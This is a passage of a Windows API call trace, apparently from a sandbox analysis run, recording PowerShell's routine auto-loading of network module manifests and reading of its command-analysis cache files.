TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa28) returned 1 [0282.493] GetTokenInformation (in: TokenHandle=0xa28, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.493] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739843f0 [0282.493] GetTokenInformation (in: TokenHandle=0xa28, TokenInformationClass=0x1, TokenInformation=0x25b739843f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739843f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.493] LocalFree (hMem=0x25b739843f0) returned 0x0 [0282.493] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7ea7c8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7ea7c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.493] CreateMutexW (lpMutexAttributes=0x25b5c7ea918, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa2c [0282.494] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa2c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.494] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.494] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.494] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.494] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0282.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.494] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7eaf78 | out: lpFileInformation=0x25b5c7eaf78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b)) returned 1 [0282.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.494] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.494] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da4bc035-2c1b-46d0-9a39-9a294fd08868", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da4bc035-2c1b-46d0-9a39-9a294fd08868", lpFilePart=0x0) returned 0x93 [0282.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.495] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da4bc035-2c1b-46d0-9a39-9a294fd08868" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da4bc035-2c1b-46d0-9a39-9a294fd08868"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa30 [0282.496] GetFileType (hFile=0xa30) returned 0x1 [0282.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.496] GetFileType (hFile=0xa30) returned 0x1 [0282.496] ReadFile (in: hFile=0xa30, lpBuffer=0x25b5c7ec218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7ec218*, lpNumberOfBytesRead=0x653ef8d338*=0x2c7, lpOverlapped=0x0) returned 1 [0282.515] ReadFile (in: hFile=0xa30, lpBuffer=0x25b5c7ec218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7ec218*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.515] CloseHandle (hObject=0xa30) returned 1 [0282.516] ReleaseMutex (hMutex=0xa2c) returned 1 [0282.516] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0282.516] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.516] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.516] CoTaskMemFree (pv=0x25b73d007a0) [0282.516] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.516] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.516] CoTaskMemFree (pv=0x25b73d007a0) [0282.516] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.517] GetCurrentProcess () returned 0xffffffffffffffff [0282.517] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa30) returned 1 [0282.517] GetTokenInformation (in: TokenHandle=0xa30, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.517] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984530 [0282.517] GetTokenInformation (in: TokenHandle=0xa30, TokenInformationClass=0x1, TokenInformation=0x25b73984530, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984530, ReturnLength=0x653ef8d6b8) returned 1 [0282.518] LocalFree (hMem=0x25b73984530) returned 0x0 [0282.518] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7f01d0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7f01d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.518] CreateMutexW (lpMutexAttributes=0x25b5c7f0320, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa34 [0282.518] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa34, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.519] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb900 [0282.519] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb900, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.519] CoTaskMemFree (pv=0x25b73cfb900) [0282.519] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0282.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.519] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7f09a0 | out: lpFileInformation=0x25b5c7f09a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875)) returned 1 [0282.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.519] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.520] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9b37c529-de86-4171-bd63-2db6f9076df9", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9b37c529-de86-4171-bd63-2db6f9076df9", lpFilePart=0x0) returned 0x93 [0282.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.520] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9b37c529-de86-4171-bd63-2db6f9076df9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_9b37c529-de86-4171-bd63-2db6f9076df9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa38 [0282.520] GetFileType (hFile=0xa38) returned 0x1 [0282.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.521] GetFileType (hFile=0xa38) returned 0x1 [0282.522] ReadFile (in: hFile=0xa38, lpBuffer=0x25b5c7f1c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7f1c70*, lpNumberOfBytesRead=0x653ef8d338*=0xdb1, lpOverlapped=0x0) returned 1 [0282.524] ReadFile (in: hFile=0xa38, lpBuffer=0x25b5c7f1c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7f1c70*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.524] CloseHandle (hObject=0xa38) returned 1 [0282.525] ReleaseMutex (hMutex=0xa34) returned 1 [0282.525] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0282.525] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.525] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.525] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.525] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff8c0 [0282.525] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff8c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.525] CoTaskMemFree (pv=0x25b73cff8c0) [0282.525] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.525] GetCurrentProcess () returned 0xffffffffffffffff [0282.525] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa38) returned 1 [0282.525] GetTokenInformation (in: TokenHandle=0xa38, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.526] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739850f0 [0282.526] GetTokenInformation (in: TokenHandle=0xa38, TokenInformationClass=0x1, TokenInformation=0x25b739850f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739850f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.526] LocalFree (hMem=0x25b739850f0) returned 0x0 [0282.526] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7f8098, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7f8098*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.527] CreateMutexW (lpMutexAttributes=0x25b5c7f81e8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa3c [0282.527] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa3c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.527] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.527] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.527] CoTaskMemFree (pv=0x25b73cfa800) [0282.527] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0282.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.527] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7f8830 | out: lpFileInformation=0x25b5c7f8830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432)) returned 1 [0282.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_48fec87d-ab72-4d34-aaee-d0ed71d145b3", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_48fec87d-ab72-4d34-aaee-d0ed71d145b3", lpFilePart=0x0) returned 0x93 [0282.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.528] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_48fec87d-ab72-4d34-aaee-d0ed71d145b3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_48fec87d-ab72-4d34-aaee-d0ed71d145b3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa40 [0282.529] GetFileType (hFile=0xa40) returned 0x1 [0282.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.529] GetFileType (hFile=0xa40) returned 0x1 [0282.529] ReadFile (in: hFile=0xa40, lpBuffer=0x25b5c7f9ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7f9ab0*, lpNumberOfBytesRead=0x653ef8d338*=0x73c, lpOverlapped=0x0) returned 1 [0282.532] ReadFile (in: hFile=0xa40, lpBuffer=0x25b5c7f9ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7f9ab0*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.532] CloseHandle (hObject=0xa40) returned 1 [0282.532] ReleaseMutex (hMutex=0xa3c) returned 1 [0282.532] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0282.532] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfce40 [0282.532] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfce40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.532] CoTaskMemFree (pv=0x25b73cfce40) [0282.532] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb6e0 [0282.532] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.532] CoTaskMemFree (pv=0x25b73cfb6e0) [0282.532] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.533] GetCurrentProcess () returned 0xffffffffffffffff [0282.533] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa40) returned 1 [0282.533] GetTokenInformation (in: TokenHandle=0xa40, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.533] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984a70 [0282.533] GetTokenInformation (in: TokenHandle=0xa40, TokenInformationClass=0x1, TokenInformation=0x25b73984a70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984a70, ReturnLength=0x653ef8d6b8) returned 1 [0282.534] LocalFree (hMem=0x25b73984a70) returned 0x0 [0282.534] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7fe8e0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7fe8e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.534] CreateMutexW (lpMutexAttributes=0x25b5c7fea30, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa44 [0282.534] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa44, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.534] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc7e0 [0282.534] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc7e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.534] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.534] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0282.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.535] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7ff070 | out: lpFileInformation=0x25b5c7ff070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c)) returned 1 [0282.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.535] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, 